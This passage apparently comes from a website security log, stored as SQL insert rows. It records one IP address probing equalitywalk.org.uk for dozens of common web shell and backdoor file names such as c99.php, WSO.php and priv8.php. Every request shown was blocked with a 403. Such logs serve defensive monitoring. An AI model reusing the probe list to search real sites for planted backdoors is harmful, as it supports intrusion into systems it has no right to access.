(Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','1wRJZoFaHd7lGOctCQbN0Px3',0,1674412151.1522,711,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://equalitywalk.org.uk/x.php?http://equalitywalk.org.uk/x.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','90lUSjNdK71YvzAOD564Qhkt',0,1674412157.8037,541,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://equalitywalk.org.uk/403.php?http://equalitywalk.org.uk/403.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','IGJTdFV3xf6mQySwlvr0E7Be',0,1674412165.9771,226,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://equalitywalk.org.uk/mini.php?http://equalitywalk.org.uk/mini.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','RvpJUAHYb2o7Za4ICdecD0w9',0,1674412174.0742,564,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://equalitywalk.org.uk/imagesvuln.php?http://equalitywalk.org.uk/imagesvuln.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','P1ADhkb5zxoSBVXs0nMqaJGN',0,1674412182.0520,241,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://equalitywalk.org.uk/edit-form.php?http://equalitywalk.org.uk/edit-form.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','Dtg61LhJyFPCkM2mnEBOoSNw',0,1674412189.4730,552,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://equalitywalk.org.uk/wikindex.php?http://equalitywalk.org.uk/wikindex.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','4DyKGMLqN83Abeh0jpV2Z6xd',0,1674412198.9017,505,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://equalitywalk.org.uk/m.php?http://equalitywalk.org.uk/m.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','aP41uFMo6p7gcwshQrOWykCf',0,1674412206.3062,288,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://equalitywalk.org.uk/0byte.php?http://equalitywalk.org.uk/0byte.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','r801ajlHcpxAk53wXBDGqz4f',0,1674412212.0137,581,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://equalitywalk.org.uk/xx.php?http://equalitywalk.org.uk/xx.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','54R01gYcynVwEv7rNKZLSh2d',0,1674412222.1434,445,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://equalitywalk.org.uk/new-index.php?http://equalitywalk.org.uk/new-index.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','bAuIPxcDvhCMGzWT01XdEgq2',0,1674412227.2024,784,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://equalitywalk.org.uk/wp.php?http://equalitywalk.org.uk/wp.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','LBE1U0l3arYtd6K8GogVPvTS',0,1674412236.8984,986,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://equalitywalk.org.uk/wp-wso.php?http://equalitywalk.org.uk/wp-wso.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','S6LJ3mpOGk1uFzEjdwars8Vg',0,1674412245.9781,227,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://equalitywalk.org.uk/qindex.php?http://equalitywalk.org.uk/qindex.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','MtjAs1WlS0wiHmIBOZeynXzF',0,1674412252.5952,374,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://equalitywalk.org.uk/priv8.php?http://equalitywalk.org.uk/priv8.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','DEeIgPNC74xr6QwkyKHMJWfp',0,1674412260.7125,262,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://equalitywalk.org.uk/minimo.php?http://equalitywalk.org.uk/minimo.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','oIaVFrdTfGyOHwhPZYQRt7Jk',0,1674412269.9186,417,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://equalitywalk.org.uk/xleet.php?http://equalitywalk.org.uk/xleet.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','XCgGVKE0mMPSju8rNYlzd5sD',0,1674412277.1498,183,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://equalitywalk.org.uk/V3.php?http://equalitywalk.org.uk/V3.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','ykqEzPFj7gWw92xvdmGXcZri',0,1674412283.4918,256,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://equalitywalk.org.uk/V5.php?http://equalitywalk.org.uk/V5.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','HDswZLW1FkQl02yoYahIGce6',0,1674412292.0639,357,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://equalitywalk.org.uk/404.php?http://equalitywalk.org.uk/404.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','q1NQoeJwBfTS0R8ZtWHzup3s',0,1674412299.2206,134,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://equalitywalk.org.uk/up.php?http://equalitywalk.org.uk/up.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','LbJprA1kuMHlSThzwFe6IUO3',0,1674412306.6701,367,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://equalitywalk.org.uk/www.php?http://equalitywalk.org.uk/www.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','vOVMq81sLumZ9QnESJ6IGetB',0,1674412312.7245,454,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://equalitywalk.org.uk/100.php?http://equalitywalk.org.uk/100.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','Md3QvmXe6Er1sU7KJ0x4ljGP',0,1674412322.4022,323,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://equalitywalk.org.uk/777.php?http://equalitywalk.org.uk/777.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','gBmUPQ0yGfDXSxFsJ6haLr8R',0,1674412330.1260,214,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://equalitywalk.org.uk/defau1t.php?http://equalitywalk.org.uk/defau1t.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','4YJhApoQ7UziwCZEGOrB301K',0,1674412336.2180,170,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://equalitywalk.org.uk/f.php?http://equalitywalk.org.uk/f.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','JHLKgIlfr7Eo43dMxeP9bF2C',0,1674412340.5541,189,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://equalitywalk.org.uk/xox.php?http://equalitywalk.org.uk/xox.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','AeHSxPjRZol9Y4fG5CcNby7X',0,1674412349.4693,212,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://equalitywalk.org.uk/o.php?http://equalitywalk.org.uk/o.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','zfOdyeIYZSgsAkKqn8Gm2N9T',0,1674412355.6909,494,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://equalitywalk.org.uk/new.php?http://equalitywalk.org.uk/new.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','hTbPy4AXL1uzQeWd2FvENxYD',0,1674412361.4822,233,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://equalitywalk.org.uk/sindex.php?http://equalitywalk.org.uk/sindex.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','ceGYFoJLryVugEDx06AqW7UM',0,1674412367.0036,749,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://equalitywalk.org.uk/baindex.php?http://equalitywalk.org.uk/baindex.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','KjeXQaLDZIcRmF5dN9J436Bw',0,1674412377.0740,496,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://equalitywalk.org.uk/wi.php?http://equalitywalk.org.uk/wi.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','o2EcLSgO8aUMRx0r6GC14dhI',0,1674412383.0263,278,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://equalitywalk.org.uk/mar.php?http://equalitywalk.org.uk/mar.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','LUg8HWMnBQYcGbSCdokTR13X',0,1674412388.9171,291,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://equalitywalk.org.uk/root.php?http://equalitywalk.org.uk/root.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','q2McPjuQpwLfXiCsoaZ4A1Ov',0,1674412393.2177,401,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://equalitywalk.org.uk/nee.php?http://equalitywalk.org.uk/nee.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','7ys2vW015SjBmLKIEpXz4Otc',0,1674412400.4283,405,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://equalitywalk.org.uk/v.php?http://equalitywalk.org.uk/v.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','9f7YujspAJovdBqcGDwOaF5M',0,1674412409.5467,199,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://equalitywalk.org.uk/z.php?http://equalitywalk.org.uk/z.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','WfD69FC2tVUB5Nq1GsdXbhgu',0,1674412419.0782,498,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://equalitywalk.org.uk/g.php?http://equalitywalk.org.uk/g.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','6qsi9tpw5YyO3kHjbJ0Ld4xC',0,1674412425.3102,498,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://equalitywalk.org.uk/c99.php?http://equalitywalk.org.uk/c99.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','6LYWTsOGyQD7wkpZl1KUhEH0',0,1674412434.3662,190,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://equalitywalk.org.uk/w.php?http://equalitywalk.org.uk/w.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','je2z83kYVZfyTJa0wCQuO6H9',0,1674412442.6599,490,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://equalitywalk.org.uk/ws.php?http://equalitywalk.org.uk/ws.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','dGpPykS0uDEVeH4j18Mw6zNB',0,1674412445.6379,208,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://equalitywalk.org.uk/2.php?http://equalitywalk.org.uk/2.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','6P7MnhfNka4wx0jd3STsvzKW',0,1674412453.1992,469,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://equalitywalk.org.uk/lol.php?http://equalitywalk.org.uk/lol.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','ftnvm8IrHuKXPATkd452WEGM',0,1674412464.1695,511,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://equalitywalk.org.uk/87.php?http://equalitywalk.org.uk/87.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','jB7gKEVQTAp1Sfv3HbN6dJa8',0,1674412471.8719,265,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://equalitywalk.org.uk/7yn.php?http://equalitywalk.org.uk/7yn.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','hV7JkPIYcaGvrxuZ4f3NWjyp',0,1674412477.9939,183,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://equalitywalk.org.uk/haxor.php?http://equalitywalk.org.uk/haxor.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','t0fZde4lTpBa6YkxOuizADIg',0,1674412485.8120,194,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://equalitywalk.org.uk/13.php?http://equalitywalk.org.uk/13.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','1dsNvRDMChfnorSB3yxAliOF',0,1674412494.4162,505,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://equalitywalk.org.uk/e.php?http://equalitywalk.org.uk/e.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','Xg6PRWm0ZDdG4lyA8CKHItNU',0,1674412509.8470,420,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://equalitywalk.org.uk/r.php?http://equalitywalk.org.uk/r.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','KQJb9qaRex14BXhoWusLEd6k',0,1674412521.0920,333,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://equalitywalk.org.uk/t.php?http://equalitywalk.org.uk/t.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','Ltk0SR31OpIQmqczuo69MPbd',0,1674412531.8155,313,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://equalitywalk.org.uk/y.php?http://equalitywalk.org.uk/y.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','P0DeFfoHCN1Ka6BXyTrMwnAg',0,1674412538.4199,183,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://equalitywalk.org.uk/u.php?http://equalitywalk.org.uk/u.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','JUTXtwraqlO6ydb5nj237KR0',0,1674412545.6750,381,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://equalitywalk.org.uk/i.php?http://equalitywalk.org.uk/i.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','9retW0HJDhF3zuRdsS1bICEn',0,1674412552.1661,297,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://equalitywalk.org.uk/p.php?http://equalitywalk.org.uk/p.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','6YqnSIZEs5Q7TLWkVhG9B0Uz',0,1674412559.1241,323,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://equalitywalk.org.uk/q.php?http://equalitywalk.org.uk/q.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','IhWCfBDpsOYGbKFP4lZmn6uz',0,1674412566.1904,591,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://equalitywalk.org.uk/s.php?http://equalitywalk.org.uk/s.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','iYXH5TnxsEmF4AypkMaI9Ror',0,1674412574.8245,341,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://equalitywalk.org.uk/d.php?http://equalitywalk.org.uk/d.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','SZsGQu3lBzpTUYIjbLqKPkef',0,1674412586.2040,185,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://equalitywalk.org.uk/h.php?http://equalitywalk.org.uk/h.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','dCq7iKhcgXATUp8Yf6PHI4yD',0,1674412593.4614,599,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://equalitywalk.org.uk/j.php?http://equalitywalk.org.uk/j.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','ISyOtKD0Qnb4Up5ejTaY9sPV',0,1674412601.2591,119,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://equalitywalk.org.uk/k.php?http://equalitywalk.org.uk/k.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','4j8wJ6V7aHoBsI3Mg5cACPQU',0,1674412609.6548,144,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://equalitywalk.org.uk/l.php?http://equalitywalk.org.uk/l.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','7b683xPCzT4WyMgs2OIcJKSj',0,1674412614.4442,160,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://equalitywalk.org.uk/n.php?http://equalitywalk.org.uk/n.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','fAyp7OVYvqhlFC26mdBu9tTx',0,1674412619.5029,607,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://equalitywalk.org.uk/xindex.php?http://equalitywalk.org.uk/xindex.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','2cfNpSuraQLU6kWJoKy0PT9j',0,1674412625.6436,641,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://equalitywalk.org.uk/kindex.php?http://equalitywalk.org.uk/kindex.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','IGR1zdkm3XTbCxO6VuKyStLc',0,1674412631.1160,265,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://equalitywalk.org.uk/FoxWSOv1.php?http://equalitywalk.org.uk/FoxWSOv1.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','jPXFrlhxvwDb37zcQC4JUBsZ',0,1674412634.8900,395,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://equalitywalk.org.uk/alf.php?http://equalitywalk.org.uk/alf.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','o0UQFNzfT19ewA8gCr4niLvd',0,1674412643.7752,318,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://equalitywalk.org.uk/bb.php?http://equalitywalk.org.uk/bb.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','E7qCGdt4gLTND6juH3AezryU',0,1674412651.5320,387,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://equalitywalk.org.uk/lf.php?http://equalitywalk.org.uk/lf.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','tmXzS8p9eGbYLWBKJUMlgrkv',0,1674412660.5043,155,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://equalitywalk.org.uk/WSO.php?http://equalitywalk.org.uk/WSO.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','N8R2WGnByebLuXQpHgDFCo0m',0,1674412667.3240,251,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://equalitywalk.org.uk/xxx.php?http://equalitywalk.org.uk/xxx.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','BfaebPtDpOg6GcWNC19kjMhF',0,1674412674.7457,158,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://equalitywalk.org.uk/hello.php?http://equalitywalk.org.uk/hello.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','EHWMhXU8tFjObfkeVpxq9ZNY',0,1674412682.7593,401,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://equalitywalk.org.uk/ok.php?http://equalitywalk.org.uk/ok.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','HdzSE1uimXpkNoYZV3DFC8lL',0,1674412692.6222,417,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://equalitywalk.org.uk/if.php?http://equalitywalk.org.uk/if.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','pOaN1sbFchVzv5eIJYo4w6fi',0,1674412702.4524,421,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://equalitywalk.org.uk/kk.php?http://equalitywalk.org.uk/kk.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 